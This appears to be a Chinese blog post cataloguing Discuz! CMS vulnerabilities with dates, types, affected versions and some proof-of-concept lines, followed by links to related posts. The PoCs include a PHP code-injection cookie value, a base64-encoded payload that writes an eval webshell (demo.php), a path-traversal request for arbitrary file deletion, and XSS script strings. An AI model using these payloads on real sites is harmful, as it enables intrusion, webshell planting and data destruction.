应用安全 - CMS - Discuz漏洞汇总
Discuz ML! V3.X 代码注入
Date
类型
代码注入导致RCE 影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012 类型:
敏感信息泄露 影响范围:
DZ x2.5 POC:
http://www.xx.xx/uc_server/control/admin/db.php
http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http://www.xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
类型:
RCE 前置条件:
().注册任意账户
().登陆用户,发表blog日志(注意是日志)
().添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
().访问日志,论坛根目录下生成demo.php,一句发密码c 影响范围:
v2.
Discuz!X2/2.5弱口令破解漏洞
Date:
类型:
登录界面暴力破解 影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
类型:
任意文件删除 前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10 类型:
前台任意文件删除 影响范围:
SSV-89024
Date:
2015.1 类型:
Discuz X2. /source/class/class_image.php 命令执行漏洞 影响范围:
Discuz X2.
Discuz! X系列远程代码执行漏洞
Date:
2015.8 类型:
RCE + XML反序列化 前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3 类型:
SSRF
影响范围:
Discuz! X2 X3 POC:
http://www.internetblog.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8 类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析 Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script> Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
应用安全 - CMS - Discuz漏洞汇总的更多相关文章
- 应用安全 - PHP - CMS - EmpireCMS - 漏洞 - 汇总
2006 Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability Empire CMS Checklevel.P ...
- 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总
SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article ...
- 应用安全 - CMS - ThinkCMF - 漏洞汇总
ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞 Date: 2019.10 类型: 任意文件写入导致远程代码执行 影响范围: ThinkCMF X1.6.0 ThinkCMF X2.1. ...
- 应用安全 - CMS - vBulletin漏洞汇总
SSV-15384 Date: 2004.11 漏洞类别: SQL 注入 SSV-15476 Date: 2005.2 漏洞类别: RCE SSV-15482 Date: 2005.2 类型: RCE ...
- 应用安全 - CMS - PHPCMS漏洞汇总
CVE-2011-0644 Date: 2011.1 类型: /flash_upload.php SQL注入 影响版本:phpCMS 2008 V2 PHPCMS PHPCMS通杀XSS 在我要报错功 ...
- 苹果cms网站漏洞修复解决办法
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,s ...
- Discuz被挂马 快照被劫持跳转该如何处理 如何修复discuz漏洞
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2.X3.3来,最稳定的社区论坛系统.目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全 ...
- 怎么修复网站漏洞 骑士cms的漏洞修复方案
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
随机推荐
- Java并发编程实战 第3章 对象的共享
可见性 可见性是由于java对于多线程处理的内存模型导致的.这似乎是一种失败的设计,但是JVM却能充分的利用多核处理器的强大性能,例如在缺乏同步的情况下,Java内存模型允许编译器对操作顺序进行重排序 ...
- linux上开启和分析mysql慢查询日志
本人qq群也有许多的技术文档,希望可以为你提供一些帮助(非技术的勿加). QQ群: 281442983 (点击链接加入群:http://jq.qq.com/?_wv=1027&k=29Lo ...
- 详解javaweb中jstl如何循环List中的Map数据_java - JAVA
文章来源:嗨学网 敏而好学论坛www.piaodoo.com 欢迎大家相互学习 详解javaweb中jstl如何循环List中的Map数据 第一种方式: 1:后台代码(测试) List<Map& ...
- vue 搜索关键词 变颜色
<a class="text"> <span>{{item.name.slice(0,item.name.toLowerCase().indexOf(inp ...
- JS收缩展开效果
// 收缩展开效果 $(document).ready(function () { $(".box h2").toggle(function () { $(this).next(& ...
- [转] 数值优化(Numerical Optimization)学习系列-目录
from:https://blog.csdn.net/fangqingan_java/article/details/48951191 概述数值优化对于最优化问题提供了一种迭代算法思路,通过迭代逐渐接 ...
- ps -aux显示信息COMMAND不全
ps -aux结果: ps -auxwww结果:
- shell基础练习题
shell 基础练习题 1.编写脚本/root/bin/systeminfo.sh,显示当前主机系统信息,包括主机名,IPv4地址,操作系统版本,内核版本,CPU型号,内存大小,硬盘大小 #!/bin ...
- 2.Python环境搭建Window、mac、linux
1.Windows安装Python详解 使用任何高级编程语言都需要有一个自己的编程环境,Python 也不例外.只要使用 Python,就必须要配置 Python 的开发和运行环境. Python 本 ...
- for循环,foreach, map,reduce用法对比+for in,for of
for不做赘述,相当简单: foreach方法: forEach() 方法用于调用数组的每个元素,并将元素传递给回调函数. 注意: forEach() 对于空数组是不会执行回调函数的. array.f ...